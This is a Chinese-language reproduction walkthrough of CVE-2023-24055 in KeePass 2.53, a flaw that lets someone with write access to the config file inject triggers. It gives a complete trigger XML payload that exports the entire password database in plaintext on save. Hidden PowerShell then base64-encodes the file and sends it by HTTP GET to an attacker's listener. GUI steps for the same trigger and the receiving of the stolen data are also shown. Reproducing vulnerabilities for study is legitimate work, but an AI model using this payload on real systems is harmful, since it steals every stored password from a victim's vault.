一、漏洞描述

漏洞简述

KeePass 是一款免费的开源密码管理器，可帮助您以安全的方式管理您的密码。您可以将所有密码存储在一个数据库中，该数据库由一把万能钥匙锁定。因此，您只需记住一个主密钥即可解锁整个数据库。数据库文件使用目前已知的最佳和最安全的加密算法（AES-256、ChaCha20 和 Twofish）进行加密。

对 KeePass 配置文件具有写入权限的攻击者可以修改它并注入恶意触发器，例如通过添加导出触发器来获取明文密码。

漏洞影响范围

供应商： KeePass 产品： KeePass Password Safe 2 确认受影响版本： KeePass 2.53版本 修复版本： KeePass 2.53.1版本

二、漏洞复现实战

环境搭建

KeePass数据库下载链接 1、右键单击以管理身份运行，注意默认安装只有英文，需要自己下载汉化包 汉化包下载 下载完之后汉化包自行解压 2、安装数据库 3、导入汉化包 将下载的汉化包拖进去选择中文，重启生效 4、新建数据库，默认命名为数据库.kdbx 5、设置管理密码，随便设置个 6、设置用户名，这里我设置的admin123，数据库名称可先不写

漏洞复现

复现攻击

用POC修改配置文件

1、创建一个触发器，在密码数据库存在交互时进行明文传输。触发器创建主要细分为两步骤： （1）POC写入配置文件

将编写好的POC代码写入KeePass.config.xml（配置文件），须符合触发器XML格式。（将poc中数据库的导出路径和攻击者的接收路径更改一下后，直接覆盖原KeePass.config.xml配置文件位置（数据库安装目录）即可）

小建议如下图：复现之前先将相关参数用记事本写下，方便利用 需要修改三处 POC编写代码如下 利用powershell以GET方式传输数据库中密码文件。

<TriggerSystem> 
    <Triggers>
                <Trigger>
                    <Guid>lztpSRd56EuYtwwqntH7TQ==</Guid>
                    <Name>exploit</Name>
                    <Events>
                        <Event>
                            <TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid>
                            <Parameters>
                                <Parameter>0</Parameter>
                                <Parameter />
                            </Parameters>
                        </Event>
                    </Events>
                    <Conditions />
                    <Actions>
                        <Action>
                            <TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
                            <Parameters>
                                <Parameter>c:\Users\你自己本地的路径数字\AppData\Local\Temp\exploit.xml</Parameter>
                                <Parameter>KeePass XML (2.x)</Parameter>
                                <Parameter />
                                <Parameter />
                            </Parameters>
                        </Action>
                        <Action>
                            <TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>
                            <Parameters>
                                <Parameter>PowerShell.exe</Parameter>
                                <Parameter>-ex bypass -noprofile -c $var=([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\同上\AppData\Local\Temp\exploit.xml')));Invoke-WebRequest -uri http://192.168.XXX.XXX:9999（kali的本机地址和监听端口，可用ifconfig查看）/$var -Method GET </Parameter>
                                <Parameter>False</Parameter>
                                <Parameter>1</Parameter>
                                <Parameter />
                            </Parameters>
                        </Action>
                    </Actions>
                </Trigger>
            </Triggers>         
            </TriggerSystem>

保存KeePass.config.xml文件，触发器功能查看exploit触发器

手工创建触发器

点击工具——触发器 点击添加 1、属性项：命名为exploit，其余默认配置 2、事件项：选择“已保存数据库文件（Saved database file）”，判断条件选“相等（Equals）” 点击完成，添加成功 3、动作项： （1）导出当前数据库

文件路径为明文传输路径

C:\Users\本地路径对应数字\AppData\Local\Temp\exploit.xml

文件格式选择 KeePass XML (2.x) 对应配置文件位置

<Parameter>C:\Users\本地路径对应数字\AppData\Local\Temp\exploit.xml</Parameter>

（2）执行命令行/URL 文件路径为PowerShell.exe，使触发器执行PowerShell

参数选择攻击接收的路径

窗口方式选择隐藏（Hidden）

对应配置文件

<Parameter>-ex bypass -noprofile -c $var=([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\同上\AppData\Local\Temp\exploit.xml')));Invoke-WebRequest -uri http://192.168.XXX.XXX:9999（kali的本机地址和监听端口，可用ifconfig查看）/$var -Method GET </Parameter>

全部添加完之后如图显示： 点击完成，登录攻击机。

攻击复现

打开攻击机（我用的kali），开启web服务，监听对应的9999端口，用于接收传输后的密码明文： 回到数据库靶机，右键添加记录 标题任意，点击确定，然后Ctrl+S保存，会提示输入密码，直接输入就行了 然后我们接着去我们kali攻击机看，发现有base64数据显示 base64加解密 解码后可以看到相关信息 在靶机的C:\Users\本地路径对应数字\AppData\Local\Temp目录中也可看到poc生成的数据库备份文件： 至此我们的CVE-2023-24055漏洞复现全部结束！